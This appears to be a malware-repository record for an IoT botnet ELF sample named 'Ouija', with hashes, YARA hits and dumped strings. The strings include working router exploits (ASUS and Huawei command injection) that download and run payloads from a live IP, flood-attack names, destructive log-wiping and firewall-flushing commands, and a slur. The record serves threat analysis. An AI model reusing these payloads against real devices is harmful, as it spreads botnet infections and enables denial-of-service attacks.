Sample details: 65946e0281abe5ca7c0abf8443dd3632 --

Hashes
MD5: 65946e0281abe5ca7c0abf8443dd3632
SHA1: d1bf609507da3e4e696c3bf3acc6a227a28572b1
SHA256: fcffd60226aebd2509ad1ae281f61138e0b864a3d8e2dc6a208795b057d9d61f
SSDEEP: 3072:k23SUfsZnrKnZjGx9aN2/JCrp5hDRElDvLmmbwx3yJE:kzrQN2hC9DRElDvLmmbwx3yJE
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 | YRP/SurtrStrings | YRP/Surtr |
Source
http://23.254.165.208/Ouija_x.86
Strings
		AUATSH
T$0t$H
[]A\A]A^A_
<rt<<w
[]A\A]
AVAUATS
X[A\A]A^
^[]A\L
A]A^A_
AWAVAUATUH
<$0u.A
[]A\A]A^A_
AWAVAUI
X[]A\A]A^A_
[]A\A]A^
Z[]A\L
Z[]A\A]
AUATUSH
Z[]A\A]L
[]A\A]
HcL$TH
HcD$TH
[]A\A]A^A_
AVAUATUSH
[]A\A]A^A_
AWAVAUATUH
[]A\A]A^A_
Z[]A\A]
H;s`t\B
Y[]A\A]
HcD$,H
[A\A]A^A_
_[]A\A]
AVAUATU
[]A\A]A^A_H
[]A\A]
[]A\A]
CpX[A\
CpZ[A\
[]A\A]L
-[]A\H
L$P|?Hc
D$0D+(H
T$ ~BA
[]A\A]A^A_
H9C uD
t/@81u
AWAVAUATUL
HcD$8H
E8H;E0wrH
9T$Xu*
[]A\A]A^A_
AUATUSH
[]A\A]A^
AUATUH
[]A\A]
[]A\A]
[]A\A]
AWAVAUATI
8[]A\A]A^A_
AUATUSH
[]A\A]A^A_
[]A\A]A^A_
[]A\A]A^A_
Z[]A\A]A^A_
[]A\A]A^A_
POST /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget%23.254.165.208/barney.sh%20;%20sh%20lessie.sh
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.254.165.208 -l /tmp/kh -r /Ouija_M.ips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
dvrhelper
dvrsupport
satori
messiah
mipsel
superh
powerpc
nigger
cayosin
messiahbins
phantom
hacker
qbotnet
openssh
apache2
telnetd
telnet
mirainet
botnet
masuta
september
pacman
senpai
shinoa
yakuza
lolnogtfo
corona
cracked
stdflood
udpflood
tcpflood
httpflood
chinese family
vsparkzyy
shadoh
osiris
killer
stdhexflood
/proc/%d/exe
/proc/%d/
[34mkiller
[37m] String match found -> 
[35m%s
[31m%d
[34mkiller
[37m] Killed bot process -> 
[33m%d
/proc/%d/maps
deleted
[34mkiller
[37m] Deleted binary match found -> 
[32m%s
[36m%d
[34mkiller
[37m] Binary match found -> 
[32m%s
[36m%d
23.254.165.208:89
x86_64
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
(null)
/x53/x65/x6c/x66/x20/x52/x65/x70/x20/x46/x75/x63/x6b/x69/x6e/x67/x20/x4e/x65/x54/x69/x53/x20/x61/x6e/x64/x20/x54/x68/x69/x73/x69/x74/x79/x20/x30/x6e/x20/x55/x72/x20x46/x75/x43/x6b/x49/x6e/x47/x20/x46/x6f/x52/x65/x48/x65/x41/x64/x20/x57/x65/x20/x42/x69/x47/x20/x4c/x33/x33/x54/x20/x48/x61/x78/x45/x72/x53/x0a
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A/x38/xFJ/x93/xID/x9A
TSource Engine Query + /x54/x53/x6f/x75/x72/x63/x65/x20/x45/x6e/x67/x69/x6e/x65/x20/x51/x75/x65/x72/x79 rfdknjms
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
%s /cdn-cgi/l/chk_captcha HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
HTTPSTOMP
HTTPHEX
HTTPCLOUDFLARE
STDHEX
/etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
rm -rf /var/log/wtmp
rm -rf /tmp/*
rm -rf /bin/netstat
iptables -F
pkill -9 busybox
pkill -9 perl
pkill -9 python
service iptables stop
/sbin/iptables -F; /sbin/iptables -X
service firewalld stop
rm -rf ~/.bash_history
history -c
BIG_ENDIAN
LITTLE_ENDIAN
BIG_ENDIAN_W
LITTLE_ENDIAN_W
UNKNOWN
[35m Ouija Devices Loading 
[0m--> 
[38;5;202m[
[0m Arch: 
[35m%s 
[38;5;202m||
[0m Type: %s 
[38;5;202m]
nf1dk5a8eisr9i32
-$.$,'*$1+ 1k52E
"*6-e1-$1e&-,+ 6 e#$(,)<e$1e1- e*1- 7e1$') e607 e$1 e$)*1E
6- ))E
 +$') E
6<61 (E
j',+j'06<'*=e
e$55) 1e+*1e#*0+!E
+&*77 &1E
j',+j'06<'*=e56E
j',+j'06<'*=e.,))eh|jE
TKWP$+gpvhp+@armgaQtcve`a[5$LPPT+5*5
Gkjpajp)Hajcpl>$074
Gkjjagpmkj>$oaat)ehmra
Eggatp>$.+.
Eqplkvm~epmkj>$@mcawp$qwavjeia9`whb)gkjbmc($vaehi9LqesamLkiaCepase}($jkjga9<<201gabf5b=a`a4a772a712=`31aa74($qvm9+gpvhp+@armgaQtcve`a[5($vawtkjwa97256b<07e06`f7<b0<b1=`6e71=3a5=g($ehckvmpli9I@1($ukt9eqpl($jg944444445($gjkjga960<`5e612454422=
8;|ih$ravwmkj95*4$;:8w>Ajrahkta$|ihjw>w9lppt>++wglaiew*|ihwket*kvc+wket+ajrahkta+$w>ajgk`mjcWp}ha9lppt>++wglaiew*|ihwket*kvc+wket+ajgk`mjc+:8w>Fk`}:8q>Qtcve`a$|ihjw>q9qvj>wglaiew)qtjt)kvc>wavrmga>SEJTTTGkjjagpmkj>5:8JasWpepqwQVH:
8+JasWpepqwQVH:8Jas@ksjhke`QVH:LQESAMQTJT8+Jas@ksjhke`QVH:8+q>Qtcve`a:8+w>Fk`}:8+w>Ajrahkta:
j57*&jE
j($56E
j57*&j+ 1j1&5E
t"&$'q!*(vp-+5w) ,u/.#E
 )5 7E
j! 3j2$1&-!*"E
j! 3j(,6&j2$1&-!*"E
$#/6!.#)w!+2$+!E
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
/bin/sh
/dev/null
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.rodata
.eh_frame
.ctors
.dtors
.comment
libc/sysdeps/linux/x86_64/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2761
p.2759
__do_global_dtors_aux
object.2814
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/x86_64/crtn.S
libc/sysdeps/linux/x86_64/crt1.S
asus_scanner.c
get_random_ip
asus_setup_connection
checksum.c
huawei_scanner.c
huaweiscanner_get_random_ip
huaweiscanner_setup_connection
main.c
i.5026
printchar
prints
printi
rand.c
resolv.c
resolv_skip_name
table.c
add_entry
toggle_obf
util.c
util_isspace
util_isdigit
util_isalpha
util_isupper
__syscall_fcntl.c
_exit.c
access.c
chdir.c
close.c
fork.c
getpid.c
getppid.c
kill.c
open.c
read.c
select.c
seteuid.c
setresuid.c
setreuid.c
setuid.c
time.c
waitpid.c
write.c
isspace.c
tolower.c
toupper.c
__C_ctype_b.c
__C_ctype_tolower.c
__C_ctype_toupper.c
closedir.c
opendir.c
__errno_location.c
clock.c
fopen.c
snprintf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4280
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4493
prefix.4494
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4493
qual_chars.4498
spec_chars.4494
spec_ranges.4495
spec_or_mask.4496
spec_and_mask.4497
fgets.c
fgets_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
libc/string/x86_64/memcpy.S
libc/string/x86_64/memset.S
libc/string/x86_64/strchr.S
libc/string/x86_64/strcpy.S
libc/string/x86_64/strlen.S
memmove.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.2050
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1440
isatty.c
tcgetattr.c
ntohl.c
inet_ntoa.c
buf.2989
inet_makeaddr.c
gethostbyname.c
buf.5285
h.5284
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
recvfrom.c
send.c
sendto.c
setsockopt.c
socket.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
calloc.c
realloc.c
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atoi.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
usleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3160
sigaction.c
__restore_rt
mmap.c
libc/sysdeps/linux/x86_64/vfork.S
clock_getres.c
execve.c
fstat.c
getdtablesize.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getrlimit.c
getuid.c
ioctl.c
mremap.c
munmap.c
nanosleep.c
sbrk.c
